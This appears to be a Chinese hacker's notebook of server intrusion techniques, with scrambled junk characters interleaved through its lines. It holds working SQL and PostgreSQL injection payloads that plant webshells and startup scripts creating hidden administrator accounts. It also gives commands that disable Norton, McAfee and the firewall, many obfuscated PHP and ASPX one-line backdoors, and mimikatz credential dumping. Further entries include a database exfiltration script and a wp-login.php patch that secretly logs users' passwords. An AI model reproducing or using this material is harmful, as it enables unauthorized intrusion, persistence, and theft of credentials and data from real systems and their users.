create table a (cmd text);! l/ a/ N# L$ Q6 z0 ^8 `9 s0 Z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );: c" q" ]! I E u& w
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 h1 A5 @! H, A0 L: ginsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );: Z* h5 i" S, h1 P+ U
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
1 v6 \0 n3 n8 f5 ~$ Qdrop table a;0 q( f& M9 _% c. g
& {! V# A- _- P/ s; [: a英文版本:* f9 T+ L. |; v. z7 Y
- p. Q! M$ T4 r$ n6 T' y
use test;# D$ w# o# A Z) c0 q
create table a (cmd text);
& G- b2 M( N2 U- R! T% z$ Sinsert into a values ("set wshshell=createobject (""wscript.shell"") " );8 _; d0 l# G1 t* k' }) z7 c
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );: Q- R1 ^$ X- L! b5 j: ~/ F, ~7 Z" y
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );# I% l' a5 F) `; l, r6 H
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
# o+ v) M) o& W7 l6 x7 }/ {8 s7 L, S% sdrop table a;4 q# e2 [% w( H$ N" g w/ I1 E
" @" w# }- L) W$ S6 t8 @2 d- h# Mcreate table a (cmd BLOB);
1 K( H2 ]; ]7 z6 H4 H9 Sinsert into a values (CONVERT(木马的16进制代码,CHAR));
0 {* G' `( S" M% R8 Pselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'! p$ }! B0 k! I
drop table a;( L% h k: a- M4 w
# C. y4 x4 J1 J! T' s0 |记录一下怎么处理变态诺顿$ O+ N) G2 R4 `
查看诺顿服务的路径
' q f" ^' X' Y0 Z; t6 _sc qc ccSetMgr6 J* F- |. L) k7 T8 _
然后设置权限拒绝访问。做绝一点。。9 i! p8 m: Z1 T8 c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system* \& k# I6 B6 a: r6 _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"9 s* |+ I+ T0 Q: S# t
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
8 \& P- P9 U, F3 b' ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
& G& e# E5 W4 N$ @
2 b# S0 w7 f" |( n% o* u然后再重启服务器
% P' d. \5 @9 Aiisreset /reboot9 o! A4 {- Z7 i& W7 f4 T* j
这样就搞定了。。不过完事后。记得恢复权限。。。。. V4 u% L9 J2 ~2 Q8 @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F# @2 `9 ^' s( Z4 U" p) A) G0 \7 n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F. w8 i8 V i2 ^
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F& i; P$ {! r( T; j3 S0 k/ r9 n( c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
. G7 M4 i8 Z# ~; ^2 ~$ SSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
% _; i0 t/ T) H/ D! W! H8 G; y/ T0 {, G
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
' m% k P) n- Z$ Y& i O4 w9 h( V; w2 r
postgresql注射的一些东西" P: D. W+ Z' g( D( P! O
如何获得webshell$ l4 Y- `0 m, [& j
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
" K7 _/ e6 j/ bhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 D- K8 M" c2 f, T. I: l8 Fhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
# Z0 K# B7 _+ `! u如何读文件$ A: H/ x h" i/ g' P
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
3 l& J; }. f6 A# Shttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;6 a9 f6 ]* D5 a6 x
http://127.0.0.1/postgresql.php?id=1;select * from myfile;" P" [" g: E5 ?7 P6 n! ~6 M, M7 m
1 |* n$ M& i0 \/ }% m- Y
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! E8 P9 W& _+ H* L {2 |! ^
当然,这些的postgresql的数据库版本必须大于8.X. _- T/ ~1 I; g% F* u1 Q; }+ d
创建一个system的函数:3 t- L8 X+ V5 P- G4 _" y( s
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT3 E( U( e3 S" m
+ F/ _" G" N" b1 \! q+ {& Q创建一个输出表:" t8 h8 v: Y% `2 O, A! t
CREATE TABLE stdout(id serial, system_out text)/ D! y# D1 g( E7 i4 P
' u/ X- G* D9 U |* w+ K
执行shell,输出到输出表内:
) |, B' J% H7 h* N I0 x' [SELECT system('uname -a > /tmp/test')* Z: V2 k5 _* r9 [
q& M4 N& a0 G7 b- x4 i, ?
copy 输出的内容到表里面;% B y& g+ c$ {
COPY stdout(system_out) FROM '/tmp/test'$ t+ d3 R; _0 E4 a6 I# {
j3 k2 Y+ m& R7 r
从输出表内读取执行后的回显,判断是否执行成功. X; h% a3 ?" ^/ e# m
# Z. m U' a4 H) F1 _SELECT system_out FROM stdout) e, N0 ]- x: H8 j5 n& b
下面是测试例子6 L: U# Y3 W8 B, s
( q4 Y: l- J" y+ W6 R) I/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 5 {% m9 x' V7 U3 Y9 b3 L) u
1 L" x& s. s$ y1 E
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'+ y$ U1 ^0 s$ V: i! y- B* P, t
STRICT --$ F: b+ L$ B$ D$ L4 h% W
8 u6 B4 T4 b' F3 P$ q! ? i
/store.php?id=1; SELECT system('uname -a > /tmp/test') --6 y$ k, w9 E. I; t! H
) j: Y Q/ f2 P' e/ r0 n5 L/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
' d% L0 G. j" x" Y9 |* A! ?$ T# p$ s6 ~% n; o/ m5 j+ P* q3 r/ A
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
' _, S1 ]% F8 f7 S- s, wnet stop sharedaccess stop the default firewall
& S6 T1 g& h; { ]$ ` {netsh firewall show show/config default firewall
3 |! Y$ ~% v+ F- ynetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
$ D1 S$ ?7 @ Q: @netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall1 X$ r% k+ U3 r
修改3389端口方法(修改后不易被扫出)
4 c% L1 r5 B; t5 k/ n修改服务器端的端口设置,注册表有2个地方需要修改
- A- @; J+ y S- m% Z- e/ j- i" f: B' A
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
2 K3 u7 w$ {# ^2 UPortNumber值,默认是3389,修改成所希望的端口,比如6000) y0 [. m1 ?0 i2 Q
. \% u9 ]' |5 H& _
第二个地方:
( i8 c8 e- ~) o" t+ p% Y[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ( D% u6 ~" K+ c4 V) o
PortNumber值,默认是3389,修改成所希望的端口,比如6000
1 h! p) b( u! o: ^1 u8 F9 }
9 x+ r* U0 v8 w$ I8 m- N现在这样就可以了。重启系统就可以了
% H2 a: }& x, Z; c6 _0 y7 x4 o4 u' ], [; t$ Y m1 X6 k
查看3389远程登录的脚本
* X4 t5 n* b {; h( H保存为一个bat文件
- d9 o/ v2 J# Z. \) G2 Udate /t >>D:\sec\TSlog\ts.log
2 d$ h7 ?5 k8 x8 m6 z8 n# n/ n) Etime /t >>D:\sec\TSlog\ts.log) o( n6 \0 Q2 y' Q
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log5 V- D; M. z$ ^5 W1 K7 S' W
start Explorer
% A* z( z |9 |' `: O: M
/ H5 e5 n9 P, X/ @ |* t" ~mstsc的参数:
9 W4 I( s2 n1 @! q2 `) m5 O
; Y( J2 C9 K# ~$ I! r8 E C x远程桌面连接
3 K$ O2 k# R/ S3 C; D% w: d
) L' }2 J( p3 I/ r/ y% kMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
& u- {8 ~- _# r6 n7 i# E& C [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
4 B6 X& K" k h# i
8 M2 |( `* ~5 X- `<Connection File> -- 指定连接的 .rdp 文件的名称。
/ G; h3 H( V- E" f9 i
0 Z$ a$ `9 I9 Z' X# z; D& Z/v:<server[:port]> -- 指定要连接到的终端服务器。
. P3 ^) L# {8 w3 j9 j/ \9 c: h/ ]% q7 ~# x% E+ |& M
/console -- 连接到服务器的控制台会话。
) J( ?6 x- B% A: k' N4 ~" A9 D
' ^+ H, l A% n/f -- 以全屏模式启动客户端。# m# L. ]0 N7 Q, O
; p) ?; N4 e; W/w:<width> -- 指定远程桌面屏幕的宽度。
( ~, q0 C0 U% ?4 W# ~9 p
5 w+ f" i( n& O1 V/h:<height> -- 指定远程桌面屏幕的高度。6 j% W3 f7 |! @ V* V `' Y( ]
& c) j8 j; \4 q1 g, }0 B/edit -- 打开指定的 .rdp 文件来编辑。
9 ^7 D$ s& y, m; k( d
# M$ s1 E$ C) k1 k) `/ B! g/ N/migrate -- 将客户端连接管理器创建的旧版
5 p5 }4 R! s; l9 ?9 q连接文件迁移到新的 .rdp 连接文件。
" I% S: k& d Q: Y5 @3 I2 \* _7 Y2 K1 q$ n. v
) F0 U, u0 o+ Q/ P! D, i& O! a
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
4 A0 V s; c# J: Z6 ?& Bmstsc /console /v:124.42.126.xxx 突破终端访问限制数量, ?: P; H( i- g1 G
" K- Q# l* [0 z1 Y( t6 I D P
命令行下开启3389
$ V, G: f, i9 X$ z, Dnet user asp.net aspnet /add K) C2 ?0 l8 q& S0 V6 b( R) n
net localgroup Administrators asp.net /add* b$ i% P' P4 F/ I
net localgroup "Remote Desktop Users" asp.net /add, s' l' \) y' W, h* W9 _% ]
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D3 U# U: K+ U4 U* h7 a6 k8 t( `7 r2 N, y
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
2 y( F/ b$ O g" gecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1( }, p ?! [# u$ R( z
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f# w) _- C9 n }( W$ b
sc config rasman start= auto
# l% ]5 O; n) R& E5 }) T. Csc config remoteaccess start= auto
. q( b/ T# Z T6 o3 L9 b1 Dnet start rasman
8 o. Y- S( W% U) dnet start remoteaccess
/ Z/ p1 W# A! x( G; uMedia
0 L W i* @2 G6 v4 u<form id="frmUpload" enctype="multipart/form-data"
5 Q6 A* G( ~8 v1 s* m9 @: u. y, }" `2 h4 Naction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> q0 s+ T& l4 c3 [2 P) t1 \* t
<input type="file" name="NewFile" size="50"><br># z" w+ q/ ]! l* t
<input id="btnUpload" type="submit" value="Upload">5 ]+ K/ O8 E/ X/ e
</form>
$ Y& h, X* J* r; G( t) M
8 g [' f+ Y7 ?control userpasswords2 查看用户的密码
, V- q2 U4 I, {: S4 Daccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
8 \, ^2 `% h7 c% {1 TSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a# e2 y: _% u2 d4 u
r# X, J5 m5 K( ^; U w" s: L, Q& U
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
& g1 K( O% r& a7 F1 w* j测试1:7 E; h5 U: l' H4 X. d# {
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% i, h/ R" |' P6 i" w- ^9 a0 t2 v1 E; T) G" X7 _
测试2:1 X( y5 {0 F9 r+ S9 V4 p
" V8 W- R( `* ]: h5 |6 N' v- q+ k* {create table dirs(paths varchar(100),paths1 varchar(100), id int)
f$ F$ {0 u4 Q7 J" ]% u" K# N! K7 t% o% [6 z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--% [ o6 Z: v8 i7 S0 ~5 ^# Z
4 p( P9 e j" m6 k( iSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t18 S" ]9 l2 Q/ X. d. M
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
: H+ R2 u1 c* l) u$ H可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;& K8 E9 \$ s/ \8 J0 z
net stop mcafeeframework6 O: x: u# H6 B3 M3 R. _8 {
net stop mcshield
$ ?$ V! P( [9 z/ F# [& lnet stop mcafeeengineservice& U' v( i/ }4 | M0 Y& E
net stop mctaskmanager) w/ J) @% S# @
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
! [ g: n+ E0 J% W l. o1 r/ B, f9 t3 o
VNCDump.zip (4.76 KB, 下载次数: 1) : w. n% o: z0 {9 [
密码在线破解http://tools88.com/safe/vnc.php" V6 Y! {& ~0 y: m7 P1 u
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取& j% d9 p; I6 y8 a
S; M5 S# e9 D$ eexec master..xp_cmdshell 'net user'5 a% h6 D3 }/ u, U5 `
mssql执行命令。$ ^7 @4 a& x p0 _- h
获取mssql的密码hash查询
2 l2 i9 n9 }! D2 e+ x1 _# u: mselect name,password from master.dbo.sysxlogins
, R( L- B5 N5 Y* Y8 O5 D, g! [ p" {3 q- L% M% d
backup log dbName with NO_LOG;" q/ U& {( r( p; f( I, W
backup log dbName with TRUNCATE_ONLY;
' X; Y) _. O! V. xDBCC SHRINKDATABASE(dbName);
& S0 g0 c' G6 O' ^$ C/ [4 \% B$ [mssql数据库压缩
. T. f8 l3 j4 S8 {" [/ G' O1 z$ v0 r- E
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
+ @- o! w. N% N将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
, r, @& k" H D0 v/ p0 F
; U+ H: x1 c1 |6 b3 }. B0 ubackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'8 Z. j9 o( h1 H0 H" V( \* B9 `. b
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
- }4 r, q! Q) Z- C7 H* V) t# B0 J
& e& x( ?9 E7 x3 f% C& U# q) M5 LDiscuz!nt35渗透要点:; N% `, d6 _& O
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default& G6 d# Y% x7 o1 n1 U: P* E8 @* }
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>5 B/ V7 Y% E8 R: F% S/ @
(3)保存。
- Y9 f0 i, g q. e2 B. ?(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass1 W1 L3 @9 \! j z5 p
d:\rar.exe a -r d:\1.rar d:\website\/ O& a* o/ [& Y4 Y1 T) G G9 |
递归压缩website
@8 x' e; T, a) E3 c注意rar.exe的路径3 i' _3 _2 W: G- h0 ^' U- _2 t
( Q$ _% ^7 A; ^9 v/ f<?php
$ I5 g v% H; }8 y
+ ?# ^2 F" l6 ]/ `( P& G# f$telok = "0${@eval($_POST[xxoo])}";
. c2 u9 D/ V4 ]* A9 D2 ~
6 N& _) G% s/ A( T0 F; g9 F( k$username = "123456";
- d- ~: v3 b# L
7 k/ x5 i) k( z0 |$userpwd = "123456";
, x5 ^% N& E) X" O
E! h; Q( D/ k, k$telhao = "123456";: u8 B* m" p7 g0 A2 E: k
; N" i+ V+ `- K% d7 V2 T+ L, h# v
$telinfo = "123456";2 L$ [( T$ Q3 D3 H
) |6 y( b8 a( i?>/ f/ J m6 U0 @
php一句话未过滤插入一句话木马8 _& v1 K d9 [& P6 c* Z
% i- u+ x! I; s& T% G% p4 S站库分离脱裤技巧
2 M" w+ ^# {5 Dexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
( k0 ], K. L& r4 @7 Kexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
8 `8 h3 C" ~3 k+ S4 M9 M条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
/ z* L! O1 a j% {) h7 q这儿利用的是马儿的专家模式(自己写代码)。
4 H% N8 Y; K) ?ini_set('display_errors', 1);. l) y3 W4 Y# p
set_time_limit(0);
2 ~0 o1 F4 x# s" ^7 r# ]error_reporting(E_ALL);" D+ R, T0 a8 q7 w# l: P7 `
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
# f- c6 w9 O/ g9 l1 k: mmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
4 [! {. v" F* l [1 _$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());; k1 O! g) n: U" ~ k
$i = 0;
6 r& x- x7 k, L' \- W3 w7 n0 I, Z$tmp = '';, H+ ~8 Q+ k' D1 R* G! j
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
: s" N8 X: S% p( o $i = $i+1;
' s; ]( R" `' y$ k$ ? V9 ?8 d $tmp .= implode("::", $row)."\n";
6 m4 Q8 S* y' g if(!($i%500)){//500条写入一个文件" w' |8 M7 C# G% E5 P" m8 D, y
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
% y7 m% e- e P0 K+ {' V file_put_contents($filename,$tmp);1 i5 @+ B) i) a4 ?
$tmp = '';
1 Z' D$ A A3 _ }7 [8 n* k7 h- x, C
}1 m m8 ~7 H1 z" N
mysql_free_result($result);
4 u$ G/ w" q% k. ~
" L- ?: G. Z: C3 c( l O( O. M% N' m" s2 m2 ^) Z, A) k a, k$ [3 ]6 R k+ \
; G) Z. `6 \$ H) ^# @//down完后delete
: |8 a' g9 _' o; V& _4 v, S% b; X- _, ~
3 i& ?; S9 T- rini_set('display_errors', 1);" V7 d; W" c* P
error_reporting(E_ALL);
+ v8 a3 w; i# @# R$i = 0;3 V& N& u `4 c6 W) o
while($i<32) {( x7 u3 S( a; x3 ?
$i = $i+1;
5 r& B0 Z* E1 x7 Z* p7 D" r $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';2 J% S4 ?. |! }0 i$ Z9 v& r
unlink($filename);
* L( N* g; c; G}
2 S' c V9 z; Ahttprint 收集操作系统指纹" X/ I ?# ^8 c/ e1 J, X
扫描192.168.1.100的所有端口0 ?( e' A% x0 {7 H
nmap –PN –sT –sV –p0-65535 192.168.1.100; q) o# S0 X0 Y! I3 F2 d4 x
host -t ns www.owasp.org 识别的名称服务器,获取dns信息+ K( H0 I8 h1 N6 h' h# N$ ?& G
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
: _. ]* a7 @& [7 `! C4 NNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
0 ?/ F& Y3 C( F9 ^+ W' }: S a6 V6 r+ a9 U' {6 } }% |7 u6 ?
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
# D9 _( _* Q" w" Z/ {9 p! b: o4 G; r6 B
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
8 @# O) D( c0 \) E6 L
) ~3 Z* e9 ?- s. K8 \9 Z Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x5 i; w# S, Q' o3 Q4 l5 V7 u" P1 |1 P: h
4 C/ [* p0 x4 y. X' x DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)1 {# ^- t' q: o1 p- j# i
% r O4 [7 ^) l* ]3 U! l, ~. E4 s http://net-square.com/msnpawn/index.shtml (要求安装)
5 l. |$ ]6 l" F& c4 R0 _1 m. b/ C2 o' k5 D5 K5 r* f. x" p
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)4 Q* w, w, C6 W9 Y* u
) P1 L5 v! v& F
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- ~5 ~% N1 H4 l2 _set names gb23128 D6 X s" `* O8 b9 C
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
6 S2 O* E0 n; y+ w, s* u" [
, I7 {( ^: A8 V7 N, [( fmysql 密码修改5 W$ S% m% x' M) ^
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” t2 n" X2 L- W, _; Y6 ^7 I X6 {0 H
update user set password=PASSWORD('antian365.com') where user='root';5 g8 K- @. h; [7 R; R/ X% k' I; `; U) k
flush privileges;
+ x* a5 t1 q) B7 n5 C9 Q高级的PHP一句话木马后门- E; T/ m. \' d' j! j6 h
! I+ b6 D1 H* I1 a" |% B7 ^入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
, f' T$ d* c# ~/ m! H* J! `' J- _3 R( e
1、! o/ r2 v: a" _7 M5 m. h5 S( d' S
% T+ z) @4 J: J# N8 L' Q2 }
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 }) C; J% P8 H0 [+ }
) n$ L: x6 E$ X; I6 B
$hh("/[discuz]/e",$_POST['h'],"Access");' n. Q9 X& h* ?0 ~5 G: s' l" Y8 ~
2 X, ~6 \, U4 a//菜刀一句话
+ Z$ a/ [3 y! q' b& J$ L' @8 T, I7 r
2、0 N% k$ H7 {5 n4 d( p, L6 ?
; q* l- l# k- m4 m
$filename=$_GET['xbid'];
: k& B( f& p$ q$ V6 B1 Q
( }! E7 X( Z$ i$ Cinclude ($filename);
9 O) x3 ]8 n( N8 n6 f& d; i# A* ]% r" z# @
//危险的include函数,直接编译任何文件为php格式运行
* w% d$ V) n* `1 ^- H% b1 _5 g( l7 ] P2 z& D2 S, r9 ?
3、& r7 z# w. Q4 [: T
% l# r7 a2 P W( h O( y) [( f$reg="c"."o"."p"."y";' f* j; n9 S# ^: h! H) J; H5 `
% H% p+ S& i" Z$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);6 N; l! k& M' e5 D* }, J
7 W8 u: A0 Y& o9 z/ a L& k
//重命名任何文件
3 ]( K, y) H9 f1 a3 _
$ O% t& o* o) n# G5 c4、
8 ?3 I. C" C m8 R( R) r# ?
: U9 f3 j6 O" F5 @+ }/ q! A: g$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
u3 \. T w1 k- ? R. G
( |5 X5 j9 K: I" x" J& q$gzid("/[discuz]/e",$_POST['h'],"Access");' [# l8 b2 s- B8 c `* g/ {
% G# x6 j _ Y) h# }//菜刀一句话
$ z+ P7 X1 P5 O9 y; t: a8 V
6 ]) J5 }4 K& D. U- D( O5、include ($uid);
0 I) l! X( B; h9 n/ N* c1 v
- H0 W$ `2 W4 X5 j; d0 Y9 N7 j0 V//危险的include函数,直接编译任何文件为php格式运行,POST 5 ^* x2 b' M T* |9 k2 V3 L, Q/ w; D
; {3 T. a% H7 c/ h
d- G9 }) f8 |//gif插一句话 ^7 U7 y0 k. p' v9 c, S7 G& H
9 V/ E2 D( u: g3 q
6、典型一句话9 _7 f% M6 v8 Y& g, s
3 L9 p0 i0 z8 [# b/ p2 B
程序后门代码6 \. g" }5 t$ P* v" ? L4 }
<?php eval_r($_POST[sb])?>( G* r4 H1 H; Z1 O; o K
程序代码( f( r# J: ^6 d& q, {
<?php @eval_r($_POST[sb])?>3 B3 q( C: e- N9 ?0 f4 ?. @# @
//容错代码
5 g6 `' K: T6 q$ D" m+ L- Q1 v* f程序代码5 w0 L3 F8 Y2 ?6 K! S7 X
<?php assert($_POST[sb]);?>) t5 n+ D" C1 j; m
//使用lanker一句话客户端的专家模式执行相关的php语句( P* t9 C! Q' u9 w& W% t2 G
程序代码
! `% ~" W& P( | y# ~<?$_POST['sa']($_POST['sb']);?>
$ ~4 B% ^9 S1 p# D; {5 @1 r }程序代码
8 N4 G7 F; a9 S4 w0 \6 u& [, V<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
2 @' M9 t) i) H& b程序代码
) I! l9 Q, V6 A+ W/ F+ O<?php
. U3 f+ S7 F, o. d1 t9 Q@preg_replace("/[email]/e",$_POST['h'],"error");
0 i% ]8 y) j. [+ D, f2 X?>
6 Y& X! M. e7 f+ `; ^# i+ E6 \//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
( P) z6 C/ o# ]) B1 x程序代码1 m0 P& p6 W8 N
<O>h=@eval_r($_POST[c]);</O>
4 x% z, V* W0 `2 A程序代码
" D1 s' N9 S; u8 K2 {3 i: d) ^<script language="php">@eval_r($_POST[sb])</script># r. Y( W+ h# V" j9 p! H0 L
//绕过<?限制的一句话1 F1 }4 K) q1 c
7 [: G6 b* F1 ^http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
- H+ W) Y+ O1 H1 _% X" I' O详细用法:
) m% x. ?& o w9 o' `% r1、到tools目录。psexec \\127.0.0.1 cmd3 W, g$ J3 Y Q/ T) i
2、执行mimikatz. @) U$ n. T/ x, I* x
3、执行 privilege::debug6 c, x9 t8 |, z7 P' o
4、执行 inject::process lsass.exe sekurlsa.dll
/ S/ E+ }4 D1 ]$ ]3 g! e) I5、执行@getLogonPasswords+ W# @4 I2 G% Z3 ?+ a- W8 b
6、widget就是密码
' ^" n7 R }7 @- z) O' G* f* k; h7、exit退出,不要直接关闭否则系统会崩溃。7 S& V% v+ H& @. t9 p8 b
2 d Y2 `6 O2 i# A! q% w
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面& _: M4 r, @0 h8 t
/ C3 W, r: `+ J) ~( l1 N
自动查找系统高危补丁
( B7 N1 P. y# `systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt9 X1 K9 g: B& f% I) T5 Q
8 ]$ Z3 y$ _0 I/ j# M* O突破安全狗的一句话aspx后门
0 r6 z) ?1 a1 R4 V3 u<%@ Page Language="C#" ValidateRequest="false" %>
1 P9 B9 f+ k6 C" L<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>$ Q9 w& R% }6 ]7 q a
webshell下记录WordPress登陆密码
& k& a Q* \6 ], d7 B" p Gwebshell下记录Wordpress登陆密码方便进一步社工
; \- o8 n i( v6 w# N$ l在文件wp-login.php中539行处添加:
$ I. ~( ^" q$ O% v% z: ]* A& O6 I// log password0 y& ?9 t4 g* A
$log_user=$_POST['log'];- m, A1 [) E4 ^$ \# L
$log_pwd=$_POST['pwd'];1 [9 t a* p9 v# m5 h, [& O
$log_ip=$_SERVER["REMOTE_ADDR"];3 R* k4 f, Z$ q l. M( M- X
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
) [: R$ N' a( T; Z, ~$txt=$txt.”\r\n”;
# L: Q" E6 _( U c9 Aif($log_user&&$log_pwd&&$log_ip){
+ h- m, C8 r4 i% O; T@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
+ R; i9 p8 J: P* i1 n- c}
* z' K% a [, y! n# _5 Z" s$ K当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。, O# Q6 F& ^. i* G, i2 f- D+ }
就是搜索case ‘login’
$ r T/ j, M2 X5 D5 B" ~# a; P在它下面直接插入即可,记录的密码生成在pwd.txt中,$ o# \# n% ?, r$ J% Y6 v$ @
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录/ x5 j1 A- L s: b$ l
利用II6文件解析漏洞绕过安全狗代码:8 _. \( u1 u& \0 n& A- @
;antian365.asp;antian365.jpg
, P, n( W; W4 }( ?
